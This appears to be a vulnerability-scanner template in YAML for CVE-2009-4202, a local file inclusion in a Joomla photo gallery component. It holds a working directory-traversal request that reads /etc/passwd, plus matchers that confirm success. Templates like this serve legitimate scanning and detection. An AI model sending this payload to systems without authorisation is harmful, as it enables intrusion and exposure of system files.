30 lines
907 B
YAML
30 lines
907 B
YAML
id: CVE-2009-4202
|
|
|
|
info:
|
|
name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/8870
|
|
- https://www.cvedetails.com/cve/CVE-2009-4202
|
|
classification:
|
|
cve-id: CVE-2009-4202
|
|
tags: cve,cve2009,joomla,lfi,photo
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|